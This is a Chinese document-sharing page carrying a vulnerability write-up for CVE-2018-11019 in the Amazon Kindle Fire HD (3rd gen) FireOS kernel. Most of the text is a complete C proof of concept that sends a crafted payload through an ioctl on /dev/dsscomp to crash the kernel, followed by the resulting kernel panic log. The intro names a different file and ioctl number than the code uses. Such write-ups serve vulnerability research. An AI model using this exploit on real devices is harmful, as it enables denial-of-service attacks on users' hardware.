版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
(CVE-2018-11019)AmazonKindleFireHD(3rd)FireOSkernel组件安全漏洞一、漏洞简介AmazonKindleFireHD(3rd)是美国亚马逊(Amazon)公司的一款FireOS平板电脑设备。FireOS是运行在其中的一套专用于Amazon设备的基于Android开发的移动操作系统。kernel是其中的一个内核组件。AmazonKindleFireHD(3rd)FireOS4.5.5.3版本中的kernel组件的kernel/omap/drivers/misc/gcx/gcioctl/gcif.c文件存在安全漏洞。攻击者可借助3221773726命令利用该漏洞注入特制的参数,造成内核崩溃。二、漏洞影响FireOS4.5.5.3三、复现过程poc/*
*ThisispocofKindleFireHD3rd
*Abugintheioctlinterfaceofdevicefile/dev/dsscompcausesthesystemcrashviaIOCTL1118064517.
*Relatedbuggystructnameisdsscomp_setup_dispc_data.
*ThisPocshouldrunwithpermissiontodoioctlon/dev/dsscomp.
*
*Thefowllwingiskmsgofkernelcrashinfomation:
*
*
*/
#include<stdio.h>
#include<fcntl.h>
#include<errno.h>
#include<sys/ioctl.h>
conststaticchar*driver="/dev/dsscomp";
staticcommand=1118064517;
intmain(intargc,char**argv,char**env){
unsignedintpayload[]={
0xffffffff,
0x00000003,
0x5d200040,
0x79900008,
0x8f5928bd,
0x78b02422,
0x00000000,
0xffffffff,
0xf4c50400,
0x007fffff,
0x8499f562,
0xffff0400,
0x001b131d,
0x60818210,
0x00000007,
0xffffffff,
0x00000000,
0x9da9041c,
0xcd980400,
0x001f03f4,
0x00000007,
0x2a34003f,
0x7c80d8f3,
0x63102627,
0xc73643a8,
0xa28f0665,
0x00000000,
0x689e57b4,
0x01ff0008,
0x5e7324b1,
0xae3b003f,
0x0b174d86,
0x00000400,
0x21ffff37,
0xceb367a4,
0x00000040,
0x00000001,
0xec000f9e,
0x00000001,
0x000001ff,
0x00000000,
0x00000000,
0x0000000f,
0x0425c069,
0x038cc3be,
0x0000000f,
0x00000080,
0xe5790100,
0x5b1bffff,
0x0000d355,
0x0000c685,
0xa0070000,
0x0010ffff,
0x00a0ff00,
0x00000001,
0xff490700,
0x0832ad03,
0x00000006,
0x00000002,
0x00000001,
0x81f871c0,
0x738019cb,
0xbf47ffff,
0x00000040,
0x00000001,
0x7f190f33,
0x00000001,
0x8295769b,
0x0000003f,
0x869f2295,
0xffffffff,
0xd673914f,
0x05055800,
0xed69b7d5,
0x00000000,
0x0107ebbd,
0xd214af8d,
0xffff4a93,
0x26450008,
0x58df0000,
0xd16db084,
0x03ff30dd,
0x00000001,
0x209aff3b,
0xe7850800,
0x00000002,
0x30da815c,
0x426f5105,
0x0de109d7,
0x2c1a65fc,
0xfcb3d75f,
0x00000000,
0x00000001,
0x8066be5b,
0x00000002,
0xffffffff,
0x5cf232ec,
0x680d1469,
0x00000001,
0x00000020,
0xffffffff,
0x00000400,
0xd1d12be8,
0x02010200,
0x01ffc16f,
0xf6e237e6,
0x007f0000,
0x01ff08f8,
0x000f00f9,
0xbad07695,
0x00000000,
0xbaff0000,
0x24040040,
0x00000006,
0x00000004,
0x00000000,
0xbc2e9242,
0x009f5f08,
0x00800000,
0x00000000,
0x00000001,
0xff8800ff,
0x00000001,
0x00000000,
0x000003f4,
0x6faa8472,
0x00000400,
0xec857dd5,
0x00000000,
0x00000040,
0xffffffff,
0x3f004874,
0x0000b77a,
0xec9acb95,
0xfacc0001,
0xffff0001,
0x0080ffff,
0x3600ff03,
0x00000001,
0x8fff7d7f,
0x6b87075a,
0x00000000,
0x41414141,
0x41414141,
0x41414141,
0x41414141,
0x001001ff,
0x00000000,
0x00000001,
0xff1f0512,
0x00000001,
0x51e32167,
0xc18c55cc,
0x00000000,
0xffffffff,
0xb4aaf12b,
0x86edfdbd,
0x00000010,
0x0000003f,
0xabff7b00,
0xffff9ea3,
0xb28e0040,
0x000fffff,
0x458603f4,
0xffff007f,
0xa9030f02,
0x00000001,
0x002cffff,
0x9e00cdff,
0x00000004,
0x41414141,
0x41414141,
0x41414141,
0x41414141};
intfd=0;
fd=open(driver,O_RDWR);
if(fd<0){
printf("Failedtoopen%s,witherrno%d\n",driver,errno);
system("echo1>/data/local/tmp/log");
return-1;
}
printf("Tryopen%swithcommand0x%x.\n",driver,command);
printf("Systemwillcrashandreboot.\n");
if(ioctl(fd,command,&payload)<0){
printf("Allocationofstructsfailed,%d\n",errno);
system("echo2>/data/local/tmp/log");
return-1;
}
close(fd);
return0;
}崩溃日志[164.793151]UnabletohandlekernelNULLpointerdereferenceatvirtualaddress00000037
[164.802459]pgd=c26ec000
[164.805664][00000037]*pgd=82f42831,*pte=00000000,*ppte=00000000
[164.813415]Internalerror:Oops:17[#1]PREEMPTSMPARM
[164.819458]Moduleslinkedin:omaplfb(O)pvrsrvkm(O)pvr_logger(O)
[164.827239]CPU:1Tainted:GO(3.4.83-gd2afc0bae69#1)
[164.834686]PCisatdev_ioctl+0x4ac/0x10c4
[164.839416]LRisatdown_timeout+0x40/0x5c
[164.844146]pc:[<c03178e8>]lr:[<c006e9b8>]psr:60000013
[164.844146]sp:c25a1e70ip:c25a1e50fp:c25a1f04
[164.857116]r10:00000000r9:d8c0aca8r8:bed5c610
[164.863128]r7:c0a25b50r6:c25a0000r5:bed5c610r4:0000000f
[164.870391]r3:00001403r2:00000000r1:20000013r0:00000000
[164.877807]Flags:nZCvIRQsonFIQsonModeSVC_32ISAARMSegmentuser
[164.885894]Control:10c5387dTable:826ec04aDAC:00000015
[164.892303]
[164.892333]PC:0xc0317868:
[164.897308]786830d2200333a03000e35300000a0001c5e3e0500deaffff02e1a0200de3c26d7f
[164.907989]7888e3c6603fe5963008e295200830d2200333a03000e35300001a000021e24b3064
[164.918670]78a8e1a01005e3a02008e50b3088e1a00003ebfcfa5fe35000001a00001ee51b4060
[164.929351]78c8e3020710e59f7bdcebf4db32e1a01000e2870038ebf55c25e35000001a0002e0
[164.939880]78e8e5943028e1a08000e5940024e1a02007e2841024e5803004e5830000e5b23070
[164.950561]7908e5871070e2420038e5831004e5843024e5842028ebf55bb9e50b8060e50b8064
[164.961212]7928ea000006e24b1064e50b1088e51b0088e3a01008ebfd0387e3a03004e50b3064
[164.971771]7948e5963008e295200830d2200333a03000e35300001affffc5e1a00005e51b1088
[164.982299]
[164.982330]LR:0xc006e938:
[164.987426]e938e1a010000a000007e3a05000e2433001e5843008e1a00004eb18d7ade1a00005
[164.997955]e958e24bd014e89da830e1a00004e50b1018eb18d135e51b1018e1a05000eafffff4
[165.008636]e978e1a0c00de92dd878e24cb004e1a04000e1a05001eb18d91be5943008e3530000
[165.019317]e998e1a060000a000007e3a05000e2433001e5843008e1a00004e1a01006eb18d794
[165.029846]e9b8e1a00005e89da878e1a01005e1a00004eb18d158e1a05000eafffff5e1a0c00d
[165.040374]e9d8e92dd800e24cb004e5903000e1a0c000e35300000a00000be5910008e5932008
[165.051055]e9f8e1500002da000003ea000006e5932008e1520000ba000003e283c004e5933004
[165.061737]ea18e35300001afffff8e5813004f57ff05fe3a00000e58c1000e89da800e1a0c00d
[165.072265]
[165.072265]SP:0xc25a1df0:
[165.077362]1df00000000100000004d454d0000000001dc25a1e3cc03178e860000013ffffffff
[165.087890]1e10c25a1e5cbed5c610c25a1f04c25a1e28c06a5318c00083700000000020000013
[165.098419]1e3000000000000014030000000fbed5c610c25a0000c0a25b50bed5c610d8c0aca8
[165.109100]1e5000000000c25a1f04c25a1e50c25a1e70c006e9b8c03178e860000013ffffffff
[165.119781]1e700000000100000028000fffffc25a1ea0c25a1edcc25a1e90c0207454c00bd920
[165.130340]1e900000001ec2db9600c25a1ed4c25a1ea8ffffffff0000000f00000000ffffffff
[165.141021]1eb0000000020000000100000000c25a1f140000000000000001d8c0aca8d70c5580
[165.151702]1ed0c25a1efcc25a1ee0c02089fc00000000c719ab4000000004c719ab40bed5c610
[165.162353]
[165.162384]IP:0xc25a1dd0:
[165.167327]1dd0c0070df8c00795acc25a00000000000100000004d454d0f46000001300000001
[165.178009]1df00000000100000004d454d0000000001dc25a1e3cc03178e860000013ffffffff
[165.188537]1e10c25a1e5cbed5c610c25a1f04c25a1e28c06a5318c00083700000000020000013
[165.199249]1e3000000000000014030000000fbed5c610c25a0000c0a25b50bed5c610d8c0aca8
[165.209899]1e5000000000c25a1f04c25a1e50c25a1e70c006e9b8c03178e860000013ffffffff
[165.220581]1e700000000100000028000fffffc25a1ea0c25a1edcc25a1e90c0207454c00bd920
[165.231109]1e900000001ec2db9600c25a1ed4c25a1ea8ffffffff0000000f00000000ffffffff
[165.241790]1eb0000000020000000100000000c25a1f140000000000000001d8c0aca8d70c5580
[165.252441]
[165.252441]FP:0xc25a1e84:
[165.257415]1e84c25a1e90c0207454c00bd9200000001ec2db9600c25a1ed4c25a1ea8ffffffff
[165.268066]1ea40000000f00000000ffffffff000000020000000100000000c25a1f1400000000
[165.278717]1ec400000001d8c0aca8d70c5580c25a1efcc25a1ee0c02089fc00000000c719ab40
[165.289276]1ee400000004c719ab40bed5c610d8c0aca800000000c25a1f74c25a1f08c0136044
[165.299926]1f04c03174480000000000000000000000000000000100000000dd045190dcf8c440
[165.310607]1f24c25a1f0cc25a0000bed5c638bed5c610c0085d9ec719ab4000000004c25a0000
[165.321136]1f4400000000c25a1f6400000000bed5c610c0085d9ec719ab4000000004c25a0000
[165.331695]1f6400000000c25a1fa4c25a1f78c01365e0c0135fc4000000000000000000000400
[165.342346]
[165.342376]R6:0xc259ff80:
[165.347320]ff8000000093000000930000008d0000000200000000000000000000000000000000
[165.358001]ffa00000000000000000000000000000000000000000000000000000000000000000
[165.368682]ffc000000093000000930000008d0000000200000000000000000000000000000000
[165.379241]ffe00000000000000000000000000000000000000000000000000000000000000000
[165.389770]0000000000000000000200000000d72b0980c0a0e8400000000100000015c265dc00
[165.400451]002000000000c25a0000c09ddc50d72b0980de949300c1620b40c25a1b7cc25a1ac8
[165.411132]0040c06a36e400000000000000000000000000000000000000000100000000000000
[165.421661]0060005634c05ebcc27f000000000000000000000000000000000000000000000000
[165.432342]
[165.432342]R7:0xc0a25ad0:
[165.437316]5ad000010105010100050104090100040001ffff0101000000000000000000040b03
[165.447875]5af001040101ffff010000000000000000000000ffff000000000e0c000001010005
[165.458526]5b10010001050000ffff000000000e0c000001010005000001050104090100040001
[165.469207]5b30ffff0101000000000000000000040b03010401013f3f01000001000101000001
[165.479736]5b50000000000000000000000001c0a25b5cc0a25b5cc0a25b64c0a25b6400000000
[165.490417]5b700000000000000001c0a25b78c0a25b78c0a25b80c0a25b800000000000000000
[165.500946]5b9000000000c0a25b94c0a25b94c0a25b9cc0a25b9c000000000000000000000001
[165.511627]5bb0c0a25bb0c0a25bb0c0a25bb8c0a25bb8c0a25bc0c0a25bc0c0a25bc8c0a25bc8
[165.522186]
[165.522186]R9:0xd8c0ac28:
[165.527282]ac28d8c0ac28d8c0ac28000000000000000000000000c06bc674000200dac09dda58
[165.537841]ac480000000000000000d8c0ac50d8c0ac5000000000c0aa5174c0aa5174c0aa5148
[165.548492]ac685aefbbda000000000000000000000000d8c0ac80000000000000000000000000
[165.559020]ac88002000000000000000000000d8c0ac94d8c0ac94dd3f6080dd3f608000000000
[165.569702]aca8000521a4000003e8000003e8000000000000000000000000c06b9600dd150400
[165.580261]acc8d8c0ad80dd3ede7000001064000000010fb000005aefbbda2e19b8325aefbbda
[165.590911]ace82e19b8325aefbbda2e19b8320000000000000000000000000000000000000000
[165.601593]ad0800000000000000000000000000000000000000010000000000000000d8c0ad24
[165.612121]Processgcioctl_poc(pid:3932,stacklimit=0xc25a02f8)
[165.619445]Stack:(0xc25a1e70to0xc25a2000)
[165.624359]1e60:0000000100000028000fffffc25a1ea0
[165.633605]1e80:c25a1edcc25a1e90c0207454c00bd9200000001ec2db9600c25a1ed4c25a1ea8
[165.642822]1ea0:ffffffff0000000f00000000ffffffff000000020000000100000000c25a1f14
[165.652038]1ec0:0000000000000001d8c0aca8d70c5580c25a1efcc25a1ee0c02089fc00000000
[165.661102]1ee0:c719ab4000000004c719ab40bed5c610d8c0aca800000000c25a1f74c25a1f08
[165.670318]1f00:c0136044c03174480000000000000000000000000000000100000000dd045190
[165.679565]1f20:dcf8c440c25a1f0cc25a0000bed5c638bed5c610c0085d9ec719ab4000000004
[165.688781]1f40:c25a000000000000c25a1f6400000000bed5c610c0085d9ec719ab4000000004
[165.697875]1f60:c25a000000000000c25a1fa4c25a1f78c01365e0c0135fc40000000000000000
[165.707092]1f80:00000400bed5c63800010e640000000000000036c0013e0800000000c25a1fa8
[165.716308]1fa0:c0013c60c0136578bed5c63800010e6400000004c0085d9ebed5c610bed5c610
[165.725402]1fc0:bed5c63800010e640000000000000036000000000000000000000000bed5c624
[165.734619]1fe0:00000000bed5c5f4000106a40002918c60000010000000040000000000000000
[165.743835]Backtrace:
[165.746856][<c031743c>](dev_ioctl+0x0/0x10c4)from[<c0136044>](do_vfs_ioctl+0x8c/0x5b4)
[165.756256][<c0135fb8>](do_vfs_ioctl+0x0/0x5b4)from[<c01365e0>](sys_ioctl+0x74/0x84)
[165.765502][<c013656c>](sys_ioctl+0x0/0x84)from[<c0013c60>](ret_fast_syscall+0x0/0x30)
[165.774780]r8:c0013e08r7:00000036r6:00000000r5:00010e64r4:bed5c638
[165.783203]Code:e2870038ebf55c25e35000001a0002e0(e5943028)
[165.793060]BoardInformation:
[165.793060]Revision:0001
[165.793060]Serial:0000000000000000
[165.793090]SoCInformation:
[165.793090]CPU:OMAP4470
[165.793090]Rev:ES1.0
[165.793121]Type:HS
[165.793121]ProductionID:0002B975-000000CC
[165.793121]DieID:1CC60000-50002FFF-0B00935D-11007004
[165.793121]
[165.844757][endtraceaba846a2af6e75b7]
[165.850097]Kernelpanic-notsyncing:Fatalexception
[165.856109]CPU0:stopping
[165.859252]Backtrace:
[165.862274][<c0018148>](dump_backtrace+0x0/0x10c)from[<c0698bb8>](dump_stack+0x18/0x1c)
[165.871643]r6:c09ddc50r5:c09dc844r4:00000000r3:c0a0e950
[165.878784][<c0698ba0>](dump_stack+0x0/0x1c)from[<c0019bd8>](handle_IPI+0x190/0x1c4)
[165.887908][<c0019a48>](handle_IPI+0x0/0x1c4)from[<c00084fc>](gic_handle_irq+0x58/0x60)
[165.897399][<c00084a4>](gic_handle_irq+0x0/0x60)from[<c06a5380>](__irq_svc+0x40/0x70)
[165.906707]Exceptionstack(0xd8dcfc38to0xd8dcfc80)
[165.912384]fc20:c153a9f800000000
[165.921600]fc40:00000002c153aa0800000007c153a9f8d8d72210b6eaf010d8caee34bab7375f
[165.930816]fc60:00000001d8dcfcac0009ededd8dcfc80c010a5b4c010a5fc20070013ffffffff
[165.940032]r6:ffffffffr5:20070013r4:c010a5fcr3:c010a5b4
[165.947052][<c010a534>](follow_page+0x0/0x238)from[<c010af94>](__get_user_pages+0x13c/0x3f0)
[165.957031][<c010ae58>](__get_user_pages+0x0/0x3f0)from[<c010b350>](get_user_pages+0x50/0x58)
[165.967102][<c010b300>](get_user_pages+0x0/0x58)from[<c00ff544>](get_user_pages_fast+0x64/0x7c)
[165.977233]r4:d8caee3c
[165.980468][<c00ff4e0>](get_user_pages_fast+0x0/0x7c)from[<c01eeff0>](fuse_copy_fill+0x1bc/0x238)
[165.990905][<c01eee34>](fuse_copy_fill+0x0/0x238)from[<c01ef0a4>](fuse_copy_one+0x38/0x68)
[166.000579]r6:d8dcdb00r5:d8dce000r4:d8dcfe24r3:00000000
[166.007690][<c01ef06c>](fuse_copy_one+0x0/0x68)from[<c01efe64>](fuse_de
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2025年度新材料研发与应用推广合同
- 2025年度脚手架工程劳务分包合同环保升级版
- 2025年度建筑垃圾清运与处理单项承包合同范本
- 2025年度豪华别墅装修服务合同协议
- 2025年度现代简约风格家居装修合同
- 2025年度借款担保合同信用评级与风险评估合同
- 2025年度酒店智能化系统升级改造工程合同范本
- 2025年度拆除工程合同履行保障与信用管理合同
- 2025年度城市河道护栏施工与生态保护合同
- 2025年度股权投资信托股权担保合同范本
- 2025年电力铁塔市场分析现状
- GB 12158-2024防止静电事故通用要求
- 《教育强国建设规划纲要(2024-2035年)》全文
- 山东省滨州市2024-2025学年高二上学期期末地理试题( 含答案)
- 化学-江苏省苏州市2024-2025学年2025届高三第一学期学业期末质量阳光指标调研卷试题和答案
- 蛋鸡生产饲养养殖培训课件
- 运用PDCA降低住院患者跌倒-坠床发生率
- 海底捞员工手册
- 立春气象与生活影响模板
- 中国服装零售行业发展环境、市场运行格局及前景研究报告-智研咨询(2025版)
- 2024年广东省公需课《新质生产力与高质量发展》考核答案
评论
0/150
提交评论